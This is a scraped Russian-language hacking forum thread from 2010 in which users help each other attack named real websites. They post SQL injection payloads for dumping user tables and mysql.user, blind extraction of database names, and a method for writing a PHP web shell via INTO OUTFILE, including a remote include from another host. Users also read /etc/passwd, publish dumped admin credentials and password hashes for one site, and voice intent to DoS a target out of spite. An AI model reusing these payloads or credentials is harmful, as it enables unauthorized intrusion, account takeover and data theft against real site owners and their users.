потом делай локальный инклуд
include("/tmp/shell.php");
Есть SQL inj.
Перебрал все таблицы и колонки, но не могу вывести информацию из этих таблиц.
5 ветка.
1,2,3,4,5,passwords,7+from+site_users--
Надо как бэ указать юзера БД, чтобы вывести информацию? Но как это сделать?
LokbatanLi
08.06.2010, 08:24
1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--
1,2,3,4,5,schema_name,7+from+information_schema.sc hemata--
ок, ну как вывести password указв при этом юзверя БД?
ок, ну как вывести password указв при этом юзверя БД?
select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129
т.е. ?
1,2,3,4,5,username,7+from+phpbb_users--
и user() - u34129
А, сори не так понял, я думал тебе надо юзера, под которым работает БД )
Если нужно вывести пароль нужного пользователя из таблицы phpbb_users, то вот так
select+1,2,3,4,5,concat_ws(0x3a,username,user_pass word),7+from+phpbb_users+where+username='имя юзера'
и подставь свои значения колонок, по дефолту для phpbb, как мне помниться это username и user_password
А, сори не так понял, я думал тебя надо юзера, под которым работает БД )
Для того, чтобы тебе вывести имя нужного пользователя из конкретной таблицы надо сделать запрос select+1,2,3,4,5,username,7+from+phpbb_users+where +username='имя юзера'
Первый раз ты правильно понял :)
мне как раз вот это и нужно
под которым работает БД )
Просто помоги составить запрос с теми данными
Первый раз ты правильно понял :)
мне как раз вот это и нужно
Просто помоги составить запрос с теми данными
Тогда select+1,2,3,4,5,password,7+from+mysql.user+where+ user='имя юзера'
например select+1,2,3,4,5,password,7+from+mysql.user+where+ user='root'
Либо select+1,2,3,4,5,concat_ws(0x3a,user,password),7+f rom+mysql.user+limit+1,1 и перебирай limit'ом
LokbatanLi
08.06.2010, 10:08
pervoe posmotri u tebya kakie bd (schema_name)
select+1,2,3,4,5,schema_name,7+from+information_sc hema.schemata
a potom posmotri table_name=>phpBB_users v kakoy bd ? naprimer imya bd test..i zapros budet..
select+1,2,3,4,5,password,7+from+phpbb_users.test
2LokbatanLi, +from+test.phpbb_users, т.е. "имя БД.Таблица"
Здесь есть инклуд?
http://agrovisual.com/index.php?action=av_show_image'&id=1104
Здесь есть инклуд?
http://agrovisual.com/index.php?action=av_show_image'&id=1104
Опять 125, ошибка не значит инклюд, это просто немогут странички ошибки загрузиться.
// Где ваша хакерская догадка люди?
// Я читал этот топик ровно неделю, я стал седым.
Есть доступ к админке CMS WebAsyst
Есть способы как залить шелл?
хей!
если "load_file('/etc/passwd') нельзя, а load_file(0x2f6574632f706173737764) можно, то записать всё равно не получится?
wildshaman
09.06.2010, 11:09
Да, меджик квотес
хей!
если "load_file('/etc/passwd') нельзя, а load_file(0x2f6574632f706173737764) можно, то записать всё равно не получится?
https://forum.antichat.ru/showpost.php?p=663815&postcount=25
wildshaman
09.06.2010, 12:13
https://forum.antichat.ru/showpost.php?p=663815&postcount=25
Случаи, когда в запрос подставляется ответ из другого не так уж и част :(
Случаи, когда в запрос подставляется ответ из другого не так уж и част :(
Да, это не всегда может прокатить и в этом посте об этом упоминается. Дал как вариант :)
Добрый день, столкнулся с оч. странной иньекцией. Иньекция есть:
http://tenderjet.com/catalog/371-1
Плюсики она вроде как тоже кушает:
http://tenderjet.com/catalog/371+-+1
но вот даже and 1=1 кушать отказывается, ругаясь незнакомыми мне ошибками. и вообще ведет себя странно: например прокатывает такое
http://tenderjet.com/catalog/371-1+1=1
Честно говоря совсем не догоняю что тут происходит, толи иньекция в каком-то непопулярном месте sql запроса, толи там что-то фильтруется...
В общем, нужен взгляд человека со стороны
Pashkela
09.06.2010, 14:26
Добрый день, столкнулся с оч. странной иньекцией. Иньекция есть:
http://tenderjet.com/catalog/371-1+1=1
Честно говоря совсем не догоняю что тут происходит, толи иньекция в каком-то непопулярном месте sql запроса, толи там что-то фильтруется...
В общем, нужен взгляд человека со стороны
http://tenderjet.com/catalog/371&&substring(version(),1,1)=5
2 Train
http://tenderjet.com/catalog/371&&(0)union(select(version()))https://forum.antichat.ru/thread125796.html
Спасибо за помощь. Кстати я гляжу редкая иньекция - бд mysql доступна.
DrakonHaSh
09.06.2010, 15:06
Pashkela
RulleR
а можно поподробнее что за &&
и что за (0) в запросе от RulleR ?
где об этом можно почитать ?
Кстати я гляжу редкая иньекция - бд mysql доступна.
http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка
http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEMA.TAB LES)) => tender@localhost
Pashkela
RulleR
а можно поподробнее что за &&
и что за (0) в запросе от RulleR ?
где об этом можно почитать ?
http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка
http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEMA.TAB LES)) => tender@localhost
Просто все дело было в плюсиках(пробелах) которые эта иньекция не переваривала а &&(0) это тоже самое что и and 0 чтобы первый запрос ничего не вывел.
INFORMATION_SCHEMA.schemata показывает базу mysql это я поторопился - показывает, но дейстивительно ничего не прочитаешь. Всеравно это к добру - налицо неправильная настройка сервера. файлы вроде тоже не читает, но ничего, прорвемся... как-нибудь
Есть php-скрипт, которому передается два параметра и jpg-файл. Скрипт конвертит jpg в png и закидывает файл в /images/ с именем image-%первый_параметр%-%второой_параметр%.png
Оба параметра практически не фильтруются(ни по длине, ни по содержанию). Есть способы обрезать конечное расширение ".png", дописываемое скриптом, чтобы залить пхпшный шелл?
%00 - безуспешно.
wildshaman
09.06.2010, 20:11
Если скрипт КОНВЕРТИТ джипег, а не переименовывает - тогда бесполезно даже пытаться.
Нет же, переименовывает. А то, что конвертит - это общий функционал.
Я же написал:
закидывает файл в /images/ с именем
image-%первый_параметр%-%второой_параметр%.png
Под параметрами я имел ввиду переменные, передающиеся POST'ом.
Народ помогите советом.
Есть уязвимый пёрл скрипт при помощи которого я могу писать в файлы, как мне запихать грёбаную функцию в pm файл который подгружается в других пёрл скриптах , что бы можно было выполнить команду. Сразу говорю писать в сами скрипты незя, слетают права на запуск =(
Я конечно совсем в перле не силен, но если в данной задаче целью является вэб-сервер, то кто мешает записать,например, пхп-шелл, насколько я знаю пхп-скриптам для работы не нужны права на исполнение. Хотя я могу ошибаться.
Да шелл есть, Safe mod там.
Ну как вариант можно и php.ini или httpd.conf переписать если права перлу позволяют и отключить сейфмод.
Или в саппорт хостинга написать чтобы отключили :) или поставили права на исполнение твоего перлового скрипта.
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
~dos~ тебе что нужно? задосить сервер или залить шелл?
~dos~ тебе что нужно? задосить сервер или залить шелл?
Первое предпочтительнее;)
1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
2). потом проверь права на чтение/запись файлов
http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3--
или так
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
выдаст root@localhost, пишешь без всяких локалхостов.
3). если все данные пункты выполнились на ура, идем дальше.
http://test/news.php?id=1+union+select+1,'код_шелла',2 ,3+into+outfile+'полный_путь_серве а'--
или если не хочешь заморачиваться (обз. условие allow_url_include=on)
http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_серв ера'--
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
Сначала попробуй залить шелл на взломанный тобой поддомен через найденную тобой скуль. Для этого нужно 3 условия:
1) file_priv - On
2) директория на запись
3) magic_quotes = Off
Как у тебя с правами (file_priv) ?
pinch опередил :)
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
с чего ты взял что сервер работает под root-ом ? ))
$user=select+user()+from+mysql.user
select+file_priv+from+mysql.user+where+user=$user (hex/char)
и в том дело я незнаю как у него обстоят дела, для этого я привел пример под root-ом
а для того чтобы он узнал user-a привел пример как это узнать
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
либо просто задосить сервак бенчмарком(если ничего другого не получится)
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.
Может кому-нибудь тут пригодится.
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.
Может кому-нибудь тут пригодится.
Дело немного в другом,я уже несколько месяцев ищу баги на том сайте(необоснованно мну там забанили и обматерили),и вот наконец-то нашел скулю на поддомене и чтоб сейчас ее постить в паблик,как-то нелогично и не разумно.Всем спасибо за помощь,буду пытаться что-то сделать...
Не могу вывести database().http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=2 and substring(version(),1,1)=5
BlackFan
10.06.2010, 20:25
2 FlaktW
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
db197513_ и так далее..
2 FlaktW
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),1,1))=0x64,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),2,1))=0x62,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),3,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),4,1))=0x39,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),5,1))=0x37,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),6,1))=0x35,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),7,1))=0x31,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),8,1))=0x33,2,1)
http://www.contra-insect.com/site/html/common/produkte/p_produkte.php?page=etisso&subpage=rasenpflege&id=220&lng=IF((mid((database()),9,1))=0x5F,2,1)
db197513_ и так далее..
Это скрипт или программа?
я думаю что в браузере это вводить надо) но можно как скрипт написать)
wildshaman
11.06.2010, 10:57
Подобрал ордером число колоно - 4
Выводу юнионом, возникает ошибка
Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
Подобрал ордером число колоно - 4
Выводу юнионом, возникает ошибка
Invalid query: Unknown table 'C1' in IN/ALL/ANY subquery
Двойной запрос...
wildshaman
11.06.2010, 11:09
Ну я примерно так и понял :)
Делать-то что?(
И еще, в другой скуле при юнионе пишет:
Invalid query: Unknown column 'createTime' in 'field list'
Как крутить?(
Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
Очень хочется взломать этот сайт! Что можете предложить?
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
md5_id,
full_name,
user_name,
user_email,
user_level,
pwd,
address,
country,
tel,
fax,
website,
date,
users_ip,
approved,
activation_code,
banned,
ckey,
ctime),6,7,8+from+etrack+--+
54::admin:admin:admin@localhost:5:4c09e75fa6fe3603 8ac240e9e4e0126cedef6d8c85cf0a1ae:admin:Switzerlan d:4433093999:::2010-05-04::1:0:0:uqd1y4v:1272992243
http://www.rsgt.com/press_releases1_more.php?id=-19+union+select+1,2,3,4,concat_ws(0x3a,id,
full_name,
user_name,
user_pwd,
user_email,
activation_code,
joined,
country,
user_activated),6,7,8+from+users+--+
6:admin::5f0210ed3fa1e3301e5fac5928cc9712:web@sisc o.com.sa:8971:2008-12-30:India:1
админка: www.rsgt.com/admin
2FlaktW, конкретно, в чем проблема?
wildshaman
11.06.2010, 20:20
Попробуй крутить как blind, error-base blind sql injection, не факт, что сработает, но как вариант, думаю можно попробовать
Спасибо, стасок помог уже, раскрутил
Как можно обойти двойной запрос??
Query: SELECT c.name AS category, b.category AS category_ident, b.reported_against AS reported_against_ident, b.release_fixed AS release_fixed_ident, s.name AS state, b.state AS state_ident, b.submit_date AS submit_date, b.submit_time AS submit_time, b.fix_date AS fix_date, b.fix_time AS fix_time, b.synopsis AS synopsis, b.duplicate AS duplicate, o.name AS os, b.os AS os_ident, b.name AS name, b.email AS email, b.repid AS repid FROM bugs b, categories c, states s, oslist o WHERE c.ident = b.category AND s.ident = b.state AND o.ident = b.os AND b.ident = -4960 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
2FlaktW, конкретно, в чем проблема?
Попасть в админку!
2FlaktW, хэш админа 5f0210ed3fa1e3301e5fac5928cc9712 пробруть, в онлайн базах вроде не нашел
FlaktW у тебя же есть логин и пароль от админки...
тут никаких проблем нету..
2GOGA075, blind, error-base blind техники пробовал?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot